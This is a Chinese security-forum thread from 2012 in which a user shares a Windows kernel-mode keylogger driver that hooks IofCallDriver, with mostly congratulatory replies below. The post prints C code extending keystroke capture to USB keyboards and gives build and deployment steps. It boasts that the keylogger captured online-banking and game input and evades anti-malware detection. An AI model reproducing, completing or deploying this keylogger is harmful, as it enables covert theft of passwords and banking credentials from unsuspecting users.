首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 社区
  2. 编程技术
    3. 发新帖
[分享]发个重口味的,ring0 keylog
发表于: 2012-10-21 21:26 14737

[分享]发个重口味的,ring0 keylog

layerfsd 活跃值
4
2012-10-21 21:26
14737
首先这个不是原创,这个是09年俄罗斯的一个组织开源过的一个代码,我略加改造而已,但貌似有的人不多。但找不到出生地了,而这个也被我改得面目全非了,原来的版权信息都没了,所以声明不了原作者的版权,抱歉了。
其次这个是能在xp--win7 32位下用的,keylog的那几种方式应该都玩烂了,这个貌似还没烂,这个是通过hook IofCallDriver来记录键盘信息的。貌似还没被报是“keyloger”。
之所以说重口味是因为以前测试的时候貌似是无所不记的,什么网银,什么游戏,什么什么什么。。。
不过这个改完了基本就废弃了,因为有bug,且对64不兼容,所以后来换了一种方式来搞。
bug的话我只能记得有俩;
1、ps2键盘的小键盘好像是记录有问题的,不过我简单处理了一下,参考client的代码
2、不能记录usb键盘的,不过这个貌似不是大问题,xkeylogger.cpp里的一个函数
GetKbdClassDevices

换成如下的,应该就可以了,但历史太久远,且我没保留这种临时代码的习惯,有需要可自己改改。
static ULONG GetKbdClassDevices()
{
	UNICODE_STRING kbd;
	WCHAR tmp[256];
	PDEVICE_OBJECT KbdDeviceObject,FoundKbdDeviceObject;
	NTSTATUS Status;
	PFILE_OBJECT FileObject;
	ULONG iClass;

	RtlInitUnicodeString(&kbd,L"\\Driver\\hidusb");
	Status = IoGetDeviceObjectPointer(&kbd,FILE_READ_ATTRIBUTES,&FileObject,&KbdDeviceObject);
	if (NT_SUCCESS(Status))
	{
		if (FoundKbdDeviceObject = FindReadKbdClass(KbdDeviceObject))
		{
			KdPrint(("[XkeyLogger] : found usb \n"));

			gKeyboardClassDevices[0] = FoundKbdDeviceObject;
		}
	}
	return 0;
}


大概就这样了,使用方法是先用wdk7600编译出来“driver”下的驱动,然后在“client”目录下生成应用层通讯代码,最后把把生成的drv.sys拷贝到编译出来那个exe的目录。生成的keylog文件记录在programfiles下的log文件。

这份代码旨在老调重弹,重温一下键盘记录的一种方式与驱动与应用层通讯的一种方式。换个方式,很多Anti也许就失效了。

[课程]Android-CTF解题方法汇总!

上传的附件:
收藏
免费 6
支持
分享
最新回复 (27)
qqlinhai
雪    币: 114
活跃值: (180)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
又要加精了吗?前排占位
2012-10-21 22:11
0
淡定疯着
雪    币: 297
活跃值: (120)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
私信
3
一天一板砖,楼主猛牛啊。
2012-10-21 23:15
0
Nermor
雪    币: 138
活跃值: (460)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
4
最近料很多啊~  不知是哪位大牛
2012-10-21 23:31
0
z许
雪    币: 1905
活跃值: (1537)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
私信
5
大牛马甲猛爆。
2012-10-21 23:32
0
cvcvxk
雪    币: 8865
活跃值: (2379)
能力值: ( LV12,RANK:760 )
在线值:
发帖
回帖
粉丝
私信
6
话说,这个代码好xx~
2012-10-22 01:32
0
哟哟哟哟
雪    币: 107
活跃值: (27)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
楼主是个神秘大牛
2012-10-22 03:29
0
goddkiller
雪    币: 485
活跃值: (78)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
私信
8
thx for share it~~
2012-10-22 08:32
0
mengzhou
雪    币: 48
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
这个有用,谢谢楼主
2012-10-22 08:56
0
星河互动
雪    币: 238
活跃值: (13)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
底层就是对设备处理麻烦多
2012-10-22 09:49
0
cogito
雪    币: 320
活跃值: (183)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
11
lz是不是换工作了?话说楼主的第四代文件加密搞完了没?提供试用一下?
2012-10-22 12:03
0
viphack
雪    币: 219
活跃值: (738)
能力值: (RANK:290 )
在线值:
发帖
回帖
粉丝
私信
12
mark mark
2012-10-22 13:41
0
guobing
雪    币: 10026
活跃值: (158)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
13

帖子: 4
精华: 4

这个才是亮点~
2012-10-22 13:45
0
yxgbo
雪    币: 34
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
14
mark mark mark
2012-10-22 14:33
0
futosky
雪    币: 862
活跃值: (329)
能力值: ( LV9,RANK:165 )
在线值:
发帖
回帖
粉丝
私信
15
最近写一个垃圾主动防御山寨版,键盘保护功能直接就把获取键盘的设备对象拦截了...不知道有没有用,呵呵
2012-10-22 15:14
0
Artmiss
雪    币: 19
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
16
支持,thks for share~
2012-10-22 16:43
0
plgs
雪    币: 389
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
17
楼主是大牛啊
2012-10-22 19:36
0
libocdf
雪    币: 119
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
18
果然加精了。。前排。。。没了。。
2012-10-22 20:46
0
我是西瓜
雪    币: 12
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
19
楼主打算占领精华区?
2012-10-22 21:38
0
萌克力
雪    币: 433
活跃值: (1895)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
私信
20
哇..发帖子都是精品啊
2012-10-23 05:45
0
zgyknight
雪    币: 2
活跃值: (164)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
21
奉旨膜拜                    
2012-10-23 10:32
0
enizumi
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
22
lz牛人~~多谢分享
2012-10-23 13:16
0
BeWideWay
雪    币: 507
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
23
.
mark
2012-10-23 13:56
0
zhenly
雪    币: 323
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
24
学习下驱动编程~
2012-10-24 16:55
0
angelrei
雪    币: 238
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
25
mark,thank you for your effort
2012-10-25 17:13
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//